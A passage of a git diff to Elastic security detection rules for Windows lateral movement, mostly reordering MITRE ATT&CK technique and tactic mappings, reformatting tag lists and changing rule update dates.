with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.003" +name = "Pass the Ticket" +reference = "https://attack.mitre.org/techniques/T1550/003/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" +[[rule.threat.technique.subtechnique]] +id = "T1558.003" +name = "Kerberoasting" +reference = "https://attack.mitre.org/techniques/T1558/003/" + + [rule.threat.tactic] id = "TA0006" diff --git a/rules/windows/lateral_movement_dcom_hta.toml b/rules/windows/lateral_movement_dcom_hta.toml index 4df87d44b05..4f7be9dafd2 100644 --- a/rules/windows/lateral_movement_dcom_hta.toml +++ b/rules/windows/lateral_movement_dcom_hta.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -85,18 +85,36 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml index e90ad419cc3..edec6ac25c0 100644 --- a/rules/windows/lateral_movement_dcom_mmc20.toml +++ b/rules/windows/lateral_movement_dcom_mmc20.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -84,36 +84,36 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml index b3becd3a64d..99d6bbb8067 100644 --- a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml +++ b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -60,7 +60,15 @@ references = ["https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round- risk_score = 47 rule_id = "8f919d4b-a5af-47ca-a594-6be59cd924a4" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -77,36 +85,19 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" - -[[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = "https://attack.mitre.org/techniques/T1559/001/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml index b5ac7330e7f..6ddfe3c7e4b 100644 --- a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml +++ b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/22" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -91,26 +91,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml index ba70c4d0f18..c2c614f4ad2 100644 --- a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml +++ b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -87,13 +87,24 @@ sequence by host.id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + [[rule.threat.technique]] id = "T1570" name = "Lateral Tool Transfer" reference = "https://attack.mitre.org/techniques/T1570/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml index e45c278391a..9f04832e1d8 100644 --- a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml +++ b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -145,23 +145,19 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml index 9a228e246ec..8dbb6d82a42 100644 --- a/rules/windows/lateral_movement_incoming_wmi.toml +++ b/rules/windows/lateral_movement_incoming_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/20" [rule] author = ["Elastic"] @@ -57,7 +57,15 @@ Windows Management Instrumentation (WMI) is a core Windows feature enabling remo risk_score = 47 rule_id = "f3475224-b179-4f78-8877-c2bd64c26b88" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -91,31 +99,26 @@ sequence by host.id with maxspan = 20s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml index 65c6a7dbcea..3352383ebb2 100644 --- a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml +++ b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/02" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -62,7 +62,21 @@ WebDav and hidden remote shares facilitate file sharing and collaboration across risk_score = 47 rule_id = "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -80,18 +94,58 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" +[[rule.threat.technique.subtechnique]] +id = "T1087.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1087/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" + + + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/windows/lateral_movement_powershell_remoting_target.toml b/rules/windows/lateral_movement_powershell_remoting_target.toml index c3800a224ff..39f0f961dc7 100644 --- a/rules/windows/lateral_movement_powershell_remoting_target.toml +++ b/rules/windows/lateral_movement_powershell_remoting_target.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -68,7 +68,17 @@ references = [ risk_score = 47 rule_id = "2772264c-6fb9-4d9d-9014-b416eed21254" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -82,18 +92,36 @@ sequence by host.id with maxspan = 30s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.006" name = "Windows Remote Management" reference = "https://attack.mitre.org/techniques/T1021/006/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/lateral_movement_rdp_enabled_registry.toml b/rules/windows/lateral_movement_rdp_enabled_registry.toml index f3703e06da7..76936f15511 100644 --- a/rules/windows/lateral_movement_rdp_enabled_registry.toml +++ b/rules/windows/lateral_movement_rdp_enabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -102,31 +102,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml index 72f7f70f5c2..197d4339c52 100644 --- a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml +++ b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [rule] author = ["Elastic"] @@ -90,13 +90,19 @@ process where host.os.type == "windows" and event.type == "start" and user.id != [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_remote_service_installed_winlog.toml b/rules/windows/lateral_movement_remote_service_installed_winlog.toml index c460493bac4..374035f3dfd 100644 --- a/rules/windows/lateral_movement_remote_service_installed_winlog.toml +++ b/rules/windows/lateral_movement_remote_service_installed_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -101,36 +101,31 @@ sequence by winlog.logon.id, winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml index b7e54f55c06..6409bf739d8 100644 --- a/rules/windows/lateral_movement_remote_services.toml +++ b/rules/windows/lateral_movement_remote_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -107,7 +107,15 @@ references = [ risk_score = 47 rule_id = "aa9a274d-6b53-424d-ac5e-cb8ca4251650" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", +] type = "eql" query = ''' @@ -153,31 +161,14 @@ sequence with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_remote_task_creation_winlog.toml b/rules/windows/lateral_movement_remote_task_creation_winlog.toml index fd0ce3a7261..43c46a6440b 100644 --- a/rules/windows/lateral_movement_remote_task_creation_winlog.toml +++ b/rules/windows/lateral_movement_remote_task_creation_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -44,7 +44,14 @@ note = """## Triage and analysis risk_score = 47 rule_id = "9c865691-5599-447a-bac9-b3f2df5f9a9d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -56,49 +63,31 @@ iam where host.os.type == "windows" and event.action == "scheduled-task-created" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/lateral_movement_scheduled_task_target.toml b/rules/windows/lateral_movement_scheduled_task_target.toml index 9f0d96a262a..53d7fe1e840 100644 --- a/rules/windows/lateral_movement_scheduled_task_target.toml +++ b/rules/windows/lateral_movement_scheduled_task_target.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] author = ["Elastic"] @@ -50,7 +50,16 @@ references = ["https://www.elastic.co/security-labs/hunting-for-lateral-movement risk_score = 47 rule_id = "954ee7c8-5437-49ae-b2d6-2960883898e9" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", +] type = "eql" query = ''' @@ -68,31 +77,31 @@ sequence by host.id, process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_unusual_dns_service_children.toml b/rules/windows/lateral_movement_unusual_dns_service_children.toml index ff217f183a0..f9f1e18e1ff 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_children.toml +++ b/rules/windows/lateral_movement_unusual_dns_service_children.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -77,7 +77,21 @@ references = [ risk_score = 73 rule_id = "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -97,26 +111,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml index a07a9bf1cf7..d7b316d6ed2 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml +++ b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/06" [rule] author = ["Elastic"] @@ 